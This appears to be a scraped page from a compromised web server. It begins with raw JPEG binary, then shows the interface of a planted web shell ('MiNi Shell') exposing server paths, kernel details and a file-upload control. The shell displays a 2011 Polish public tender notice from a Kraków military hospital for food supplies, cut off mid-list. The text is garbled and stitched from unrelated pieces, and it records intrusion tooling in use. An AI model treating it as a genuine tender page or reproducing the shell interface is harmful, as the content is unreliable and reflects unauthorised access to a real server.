JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110114/5684-N-2011.html

<p class="kh_header"><b>Kraków: DOSTAWY

ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 5684 - 2011; data zamieszczenia: 14.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 012 6308057, 6308059, faks 012 6308059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY

ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET NR 1 - PIECZYWO I WYROBY CUKIERNICZE
	PAKIET NR 2 - ARTYKUŁY SPOŻYWCZE
        PAKIET NR 3 - RYBY
        PAKIET NR 4 - MROŻONKI
	PAKIET NR 5 - WODA
	PAKIET NR 6 - WODA II
	PAKIET NR 7 - OWOCE CYTRUSOWE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.23.00.00-9, 15.33.11.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jest zarejestrowany we właściwym rejestrze lub wpisany do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
1.2.	Posiada zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej - na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienie ( Dz. U. 171,poz. 1225 z późn. zmianami) o ile dotyczy;
1.3.	Posiada wdrożony system HACCP o ile dotyczy;
1.4.	Posiada zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno - spożywczymi do Wojewódzkiego Inspektora Jakości Handlowej Artykułów Rolno - Spożywczych, zgodnie z art. 12 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych ( Dz. U. z 2005 r. 
Nr 187, poz. 1577 ze zm.) o ile dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada niezbędną wiedzę i doświadczenie  do wykonania  zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje potencjałem technicznym  wykonania  zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje  osobami zdolnymi do wykonania  zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy.
3.1. przedstawi w dniu podpisania umowy polisę ubezpieczeniową od odpowiedzialności cywilnej 
(deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej 
 ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone 
          przez Wykonawcę . Wartość polisy winna być równa lub wyższa sumie wartości zawieranej  
umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony  FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2)	  Wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA według ZAŁĄCZNIKANR 1 do SIWZ.
3)	  Pełnomocnictwo do podpisania oferty w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 
4)	  Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
5)	 Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - o ile dotyczy Wykonawcy.
6)	  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7)	  Zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej Państwowej lub organu Inspekcji Weterynaryjnej - na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienie ( Dz. U. 171,poz. 1225 z późn. zmianami) o ile dotyczy.
8)	  Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi wydane przez Wojewódzkiego Inspektora Jakości Handlowej Artykułów Rolno-Spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę Wykonawcy zgodnie z art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2005 Nr 187, poz. 1577 ze zm.) o ile dotyczy.
9)	  Potwierdzenia wdrożonego systemu HACCP, o ile dotyczy,  w jednej z następujących form: 
a)	certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju albo
b)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 Nr 171 poz. 1225.).
10)	 Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  
 zamiast dokumentu, o którym mowa w pkt 6 składa odpowiedni dokument lub dokumenty,   
 wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
 odpowiednio, że:
 a ) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej   
     niż 6 miesięcy przed upływem terminu składania ofert.
11)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10, zastępuje się je dokumentem  zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 10 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
1.	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
2.	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
3.	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SEKCJA ZAMÓWIEŃ PUBLICZNYCH 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2011 godzina 11:00, miejsce: KANCELARIA 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ ( BUDYNEK KOMENDY)  UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb mieszany żytnio-pszenny, krojony /1 szt. a  0.6 kg/
Termin przydatności do spożycia 4 dni   	1581000-6	20 000kg 

2.	Bułka pszenna /1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	12 000 kg
3.	Bułka graham / 1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	    1 200kg

4.	Pączki /1 szt. a 0, 15kg/
Termin przydatności do spożycia 1 dzień    	15812000-3	     40 kg    

5.	Babka drożdżowa /1szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      80kg

6.	Ciasto piaskowe /1 szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      120 kg

7.	Makowiec / 1 szt. a 1 kg/ 
Termin przydatności do spożycia 4 dni   	15812000-3	       35 kg

8.	Bułka tarta / 1 op. a 1 kg/
(opakowanie zbiorcze 10 kg). 
Termin przydatności do spożycia 30 dni    	15811400-0	     340 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier kryształ /a1 kg/ (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 24 miesiące   	15831000-2	  670 op.
2.	Mąka pszenna typ 500 /a1 kg/ (opakowanie zbiorcze 10 kg) Termin przydatności do spożycia 12 miesięcy   
	15612100-2	  370 op.

3.	Kasza manna /a1 kg/ (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy   	03211900-2	  120 op.
4.	Płatki owsiane /a1 kg/ (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy    	15613380-5	    60 op.

5.	Mąka ziemniaczana /a0.5 kg/ (opakowanie zbiorcze 5 kg)
Termin przydatności do spożycia 12 miesięcy    	15620000-0	    8 op.

6.
	Kawa zbożowa /a 0.5 kg/ (opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia 12 miesięcy   	15862000-8	  86 op. 
7.	Kawa naturalna ziarnista /a1 kg/ I kl. (opakowanie zbiorcze 6 kg)
Termin przydatności do spożycia 18 miesięcy   	15861100-2	     4 op.
8. 
	Kawa naturalna rozpuszczalna /a 0.2 kg/ (opakowanie zbiorcze 2.40 kg) 
Termin przydatności do spożycia 18 miesięcy    	15861000-1	     3 op.
9.	Kakao /a0.1 kg/ (opakowanie zbiorcze 1.20 kg) Termin przydatności do spożycia 18 miesięcy   
	15841000-5	     5 op.

10.	Budyń bez cukru-śmietankowy /a 0.06 kg/ (opakowanie zbiorcze 3kg)     
  Termin przydatności do spożycia 12 miesięcy    	15332200-6	   56 op.
11.	Galaretka owocowa- różne smaki /a 0.09kg/ (opakowanie zbiorcze 4.5kg)
Termin przydatności do spożycia 12 miesięcy    	15332240-8	  10 op.

12.	Herbata liściasta czarna /a 0.1 kg/
(opakowanie zbiorcze 2 kg)
Termin przydatności do spożycia18 miesięcy     	15863200-7	 180 op.
13.	Herbata w saszetkach czarna ze sznureczkiem /a200g/
(opakowanie zbiorcze 0.80 kg)
Termin przydatności do spożycia 18 miesięcy 	15841000-3	   20 op.

14.	Herbata w saszetkach zielona/a50 g/
(opakowanie zbiorcze  0.20 kg)
Termin przydatności do spożycia 18 miesięcy	15863100-6	    10 op.

15. 	Makaron 2 -jajeczny różny(nitki, łazanki, kolanka, muszelki, świderki) /a1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy	15613300-1	  190 op.

16.	Kasza jęczmienna perłowa średnia /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy	03211900-2	  120 op.       

17.	Kasza gryczana /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy	03211900-2	    20 op.

18.	Groch łuskany - połówki /a 0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 12 miesięcy	03212213-6	    10 op.

19.
	Fasola JAŚ - duży /a0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 12 miesięcy	03221210-1	   30 op.
20.	Ryż długoziarnisty biały /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 12 miesięcy 	15614100-6	 290 op.
21.
	Pasta pomidorowa 30% /a0.6 kg/opakowanie metalowe (opakowanie zbiorcze 14.4kg)
Termin przydatności do spożycia 12 miesięcy	15331134-5	80op.
22.
	Sok pomidorowy / a 1 L /szt./
(opakowanie zbiorcze 12 szt.)
Termin przydatności do spożycia 6 miesięcy	15322100-2	140 op.
23.	Sok owocowy bez cukru /a1 L/szt./
(opakowanie zbiorcze 12 L/szt.)
Termin przydatności do spożycia 6 miesięcy	15321000-4	    6 op.
24.
	Papryka konserwowa /a 0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia 18 miesięcy	15331136-9	 100 op.
24.	Ogórek konserwowy / a 0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia 18 miesięcy	15331000-7	 100 op.
25.	Fasolka szparagowa, - konserwowa /a 2.6 kg/
Luzem (puszka 2.60 kg)
Termin przydatności do spożycia 12miesięcy	15331131-4	500 puszek.
26.	Groszek konserwowy /a0.4 kg/
( opakowanie zbiorcze 4 kg)
Termin przydatności do spożycia 18 miesięcy	15331400-1	 110 op.
27.	Kukurydza konserwowa /a 0.4kg/
(opakowanie zbiorcze 4 kg) 
Termin przydatności do spożycia 18 miesięcy	15331400-1	  70 op.
28.	Musztarda kremowa o smaku łagodnym /a 0.2 kg/
(opakowanie zbiorcze 4.8 kg)_
Termin przydatności do spożycia 6 miesięcy	15871250-1	  90 op.
29.	Keczup łagodny /a0.45 kg/
(opakowanie zbiorcze  7.2 kg)
Termin przydatności do spożycia 6 miesięcy	15871123-5	  70 op.
30.	Olej rzepakowy /a1L/szt./
(opakowanie zbiorcze 6 L /szt.)
Termin przydatności do spożycia 6 miesięcy	15411100-3	220op.
31.
 	Pieczywo ryżowe naturalne /a 0.10kg/
(opakowanie zbiorcze  2.00 kg)
Termin przydatności do spożycia 6 miesięcy	15821130-9	    12op.
32.
	Sucharki /a 0.29kg/
(opakowanie zbiorcze 5.8 kg)
Termin przydatności do spożycia 6 miesięcy	15821150-5	  55 op.
33.	Herbatniki słodkie z marmoladą /a 0.16 kg/
(opakowanie zbiorcze  3.2 kg)
Termin przydatności do spożycia 6 miesięcy	15821200-1	  5 op.
34.
	Biszkopty wrocławskie /a 0.12 kg/
(opakowanie zbiorcze 2.4 kg)
Termin przydatności do spożycia 6 miesięcy	15820000-2	170 op.
35.
	Żelatyna spożywcza wieprzowa /a 0.05kg/
(opakowanie zbiorcze 1 kg)
Termin przydatności do spożycia 6 miesięcy	03142300-1	   15 op.
36.
	Dżem z czarnej porzeczki /a 0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia 6 miesięcy	15332293-4	 70 op.
37.	Marmolada wieloowocowa /a 0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia 12 miesięcy	15332230-5	  10 op.
38.	Powidło śliwkowe /a 0.3kg/
(opakowanie zbiorcze 2.7 kg)
Termin przydatności do spożycia 12 miesięcy	15332270-7	   60 op.
40.	Miód naturalny /a 0.9 kg)
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia 12 miesięcy	03142100-9	   30 op.
41.	Maggi do zup w płynie /a 1L/szt./
(opakowanie zbiorcze 6 L/szt.)
Termin przydatności do spożycia 18 miesięcy	15870000-7	  110op. 
42.	Kucharek do potraw /a1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia 12 miesięcy	15893000-4	  25 op.
43.	Przyprawa do drobiu /a1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia 12 miesięcy	15872000-1	  3op.
44.	Pieprz naturalny mielony /a1. kg/
Luzem
Termin przydatności do spożycia 18 miesięcy	15870000-7	  35kg
45.	Pieprz ziołowy /a0.02kg/
(opakowanie zbiorcze 0.5 kg
Termin przydatności do spożycia 18 miesięcy	15872000-1	  10op.
46.	Papryka słodka mielona /a1 kg/
Luzem
Termin przydatności do spożycia 18 miesięcy	15872000-1	  15 kg
47.	Liść laurowy /a 1 kg/
Luzem
Termin przydatności do spożycia 18 miesięcy	15872000-1	   4 kg
48.	Kminek /a 1.kg /
Luzem
Termin przydatności do spożycia 18 miesięcy	15872000-1	  12 kg
49.	Ziele angielskie /a0.02 kg/
(opakowanie zbiorcze 0.5 kg)_
Termin przydatności do spożycia 18 miesięcy	15872000-1	  20 op.
50.	Kwasek cytrynowy /a 1 kg /
Luzem
Termin przydatności do spożycia 18 miesięcy	15800000-6	  55 kg
51.	Majeranek /a 0.2 kg /
(opakowanie zbiorcze 1 kg) 
Termin przydatności do spożycia 18 miesięcy	15872000-1	    9 op.      
52.	Ocet spirytusowy /a 0.5 L/szt./
(opakowanie zbiorcze 10 L)
Termin przydatności do spożycia 18 miesięcy	15871100-5	  35 op.
53.	Żurek /a 0.5 L /
(opakowanie zbiorcze 6 L)
Termin przydatności do spożycia 30 dni	15610000-7	  100 op.
54.	Chrzan tarty w occie / a0.26 kg/    
